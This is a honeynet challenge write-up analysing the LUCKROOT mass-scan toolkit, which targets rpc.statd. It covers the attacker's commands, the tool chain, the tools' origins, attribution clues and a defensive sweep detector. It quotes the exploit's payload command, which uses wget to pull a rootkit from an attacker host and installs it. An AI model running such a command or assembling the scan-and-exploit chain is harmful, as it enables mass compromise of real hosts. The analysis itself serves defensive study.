Scan13, Max Vision <vision@whitehats.com>

1. What is the blackhat attempting to do with his command line syntax?

The intruder creates an obscure directory as a workspace (/usr/sbin/.mail) and downloads the LUCKROOT toolset from another web server under control of the attacker (becys.org). The filename is misleading, as it is actually a gzipped tar (.tar.gz or .tgz). The intruder extracts the tools and runs the luckgo script several times against various networks. The networks targeted were most likely entered at random; however, they map to the following:

command typed      network attacked    who owns it?
./luckgo 216 210   216.210.0.0/16      TotalNet Inc.
./luckgo 200 120   200.120.0.0/16      unallocated
./luckgo 64 120    64.120.0.0/16       unallocated
./luckgo 216 200   216.200.0.0/16      Abovenet Communications, Inc.
./luckgo 200 120   repeat
./luckgo 63 1      64.1.0.0/16         UUNET Technologies, Inc.
./luckgo 216 10    216.10.0.0/16       many class c allocations (various)
./luckgo 210 120   210.120.0.0/16      many class c allocations (Korean)
./luckgo 64 1      64.1.0.0/16         unallocated
./luckgo 216 1     216.1.0.0/16        several class c allocations
./luckgo 194 1     194.1.0.0/16        many class c allocations (Slovak Republic)
./luckgo 216 1     repeat
./luckgo 210 128   210.128.0.0/16      many class c allocations (Japan)
./luckgo 24 1      24.1.0.0/16         @Home Network (numerous regions)
./luckgo 12 20     12.20.0.0/16        many class c allocations (ATT)

Notice that the attacker would have scanned roughly 196k unallocated IPs (65k of those scanned twice) had the Honeynet firewall allowed the outbound connections, a considerable waste of resources and a clear illustration that much of the script kiddie behavior is random. Worse still, though less illustrative of their inefficiency, is that they would have scanned roughly 655k IPs in allocated space, possibly compromising hundreds of machines. A complete list of affected networks is available upon request (vision@whitehats.com), but anyone can look these allocations up from ARIN.

2. What does the tool accomplish?

LUCKROOT is an exploit package composed of the following tools:

Tool          Description
luckgo        shell script
              Runs luckscan-a against a network address range specified at the command line. If the luckscan-a and luckstatdx program binaries are not present, this script detects this and tries to compile them from source. If a scan.log file is present it is deleted.
luckscan-a    c source and binary
              Network scanner that sweeps the specified IP range for a particular service using tcp connect (noisy full-connection). When called from the luckgo script, it always scans for the portmap service at port 111. Each time the scanner finds a host running portmap, it launches luckstatdx, passing the target IP as a parameter (./luckstatdx -d 0 TARGET).
luckstatdx    c source and binary
              Rpc.statd remote exploit that can be used to run arbitrary code on the target server. When called from luckscan-a, this exploit always uses the default settings to attack Redhat 6.2. Upon gaining access on the target server, luckstatdx runs the following shell commands, which effectively trojan the remote system:
              cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz


3. How does the tool work?

luckgo is a shell script that runs the scanner against a target network. The attacker runs the luckgo script with the first two octets of their intended victim network as the parameter. For example if they wished to scan and exploit 10.10.0.0/16, they would type "./luckgo 10 10". luckgo runs the scanner luckscan-a, which in turn runs the exploit luckstatdx against each target IP that is determined to have the portmap service running. The scanner makes no attempt to determine the operating system type or version before launching the exploit, so this shotgun approach is basically a blind mass-attack.

When a vulnerable target is found, the rpc.statd exploit is run against the host, causing certain shell commands to be run on the remote server. These commands cause the victim to download and install a rootkit called "xzibit", which replaces system commands with the intention of hiding the intruder's presence and allowing remote access.
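The sweep described above has a recognisable shape from the firewall's side: one source making tcp/111 connection attempts to many distinct hosts inside a single /16, exactly the block "./luckgo A B" expands to. The following detector is an added example for this writeup, not code from the LUCKROOT package or the Honeynet Project; the iptables-style log lines it processes are constructed here, and the threshold of 20 distinct hosts is an assumed tuning value.

```python
import re
from collections import defaultdict

# Assumed iptables-style field layout for the constructed log lines.
LOG_RE = re.compile(r"SRC=(\S+) DST=(\S+) PROTO=TCP DPT=(\d+)")
PORTMAP = 111  # luckscan-a, as run by luckgo, always probes portmap


def slash16(ip):
    """Map a destination IP to the /16 that './luckgo A B' would have targeted."""
    a, b = ip.split(".")[:2]
    return f"{a}.{b}.0.0/16"


def detect_portmap_sweeps(lines, min_hosts=20):
    """Group outbound tcp/111 attempts by (source, destination /16) and flag any
    pair that touched at least min_hosts distinct targets.
    Returns {(src, cidr): distinct_target_count} for the flagged pairs."""
    targets = defaultdict(set)
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        src, dst, dport = m.group(1), m.group(2), int(m.group(3))
        if dport == PORTMAP:
            targets[(src, slash16(dst))].add(dst)
    return {key: len(t) for key, t in targets.items() if len(t) >= min_hosts}


def build_sample_log():
    """Constructed sample (not from the original page): one host sweeping
    216.210.0.0/16 on tcp/111, a short burst into 216.200.0.0/16 that stays
    under the threshold, and unrelated web traffic from another host."""
    lines = [f"SRC=10.0.0.5 DST=216.210.0.{i} PROTO=TCP DPT=111" for i in range(1, 41)]
    lines += [f"SRC=10.0.0.5 DST=216.200.0.{i} PROTO=TCP DPT=111" for i in range(1, 6)]
    lines += ["SRC=10.0.0.7 DST=192.0.2.10 PROTO=TCP DPT=80",
              "SRC=10.0.0.7 DST=192.0.2.11 PROTO=TCP DPT=443"]
    return lines


if __name__ == "__main__":
    for (src, cidr), n in detect_portmap_sweeps(build_sample_log()).items():
        print(f"{src} swept {cidr}: {n} distinct hosts on tcp/111")
```

Lowering min_hosts trades fewer missed sweeps for more noise from legitimate NFS clients; on a honeynet, where no outbound tcp/111 is expected at all, a threshold of 1 is reasonable.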

4. Is this tool a worm, or would you classify it as something else?

LUCKROOT is not a worm because it lacks an automated infection mechanism. This tool is used manually by an attacker to scan large network blocks for the rpc.statd vulnerability and exploit potential targets. This tool is a "scripted scan and exploit package".

5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified?

All tools in the LUCKROOT package are slight variations of existing tools. In the underground community this is called "ripping" and is an all-too-frequent occurrence where one person takes "credit" for the work of another.

tool name     original release / what changed
luckgo        June 2000. Shell script included in VetesGirl's scanning tools, which can be seen at http://www.self-evident.com/exploits/vetes/. There are several tool packages, each with a different name but using the same code. For example, look at amdscanner.tar.gz for the file "/amd/massa/ama" and compare it to luckgo.
              What changed: the author credits were changed from "VetesGirl" to "BeCyS", and there were slight changes to the names of each program.
luckscan-a    June 2000. C program also included in VetesGirl's scanning tools from http://www.self-evident.com/exploits/vetes/. Using the same example as above, you can look at the file "/amd/massa/pscan-a.c" from amdscanner.tar.gz and compare it to luckscan-a.c.
              What changed: instead of just displaying which targets have the open port, the program now exploits each target as well.
luckstatdx    August 2000. rpc.statd exploit written by ron1n, posted to Bugtraq as statdx.c:
              http://www.securityfocus.com/archive/1/74148
              Note that this is the old version of the exploit; there have been several other exploits since, including an update from ron1n called statdx2.c, but for some reason attackers only seem to be using the older version.
              What changed: author credits have been changed from "ron1n" to "becys", and the commands run on the exploited target host have been altered to instead retrieve and install a rootkit.

Bonus Question:
What information can you obtain about who is using or created the tool?

The source IP address used in the attack wasn't shown in the challenge, but there are numerous clues to consider about the tool author from analysis of the tool.

Where the tools came from: The LUCKROOT.TAR package is downloaded from becys.org, a site which has only a shockwave intro with no further content. Inspection of the domain record shows that the domain was created last year using suspicious information - for example, I called the contact phone number listed and the person had no idea about the becys.org domain. The contact address becys@yahoo.com shows up in the domain record and becys@becys.org in the attack tool. Since the rootkit is still available for download from becys.org, it is somewhat likely that this host is controlled by the attacker (apparently BeCyS).

Credits in the attack tools: BeCyS, ReSpEkT, and coSes are mentioned in the tools as authors or references. I looked for each name in the large IRC networks, and found ReSpEkT on Undernet. I asked about BeCyS and through five minutes' conversation was told that there are feuds between them and that BeCyS may have dropped ReSpEkT's name to get him in trouble. There was nothing conclusive here, as it may all be the same individual, though it would imply a higher level of deception and forethought than is evidenced by the use of the attack tools. ReSpEkT was in a channel with known Romanian blackhats who we have seen attack the honeynet before.

Rootkit configuration files: There are some preset variables in the xzibit.tar.gz rootkit downloaded from becys.org. Three address ranges are specified that will cause the trojaned system utilities to ignore traffic from certain networks, which are all in Romania. One is the Romanian Education Network, and the other two appear to be .ro ISPs. Again assuming the attacker or attackers lack the sophistication to employ an elaborate decoy or framing operation, this would indicate the intruder is connecting from Romania.

Max :)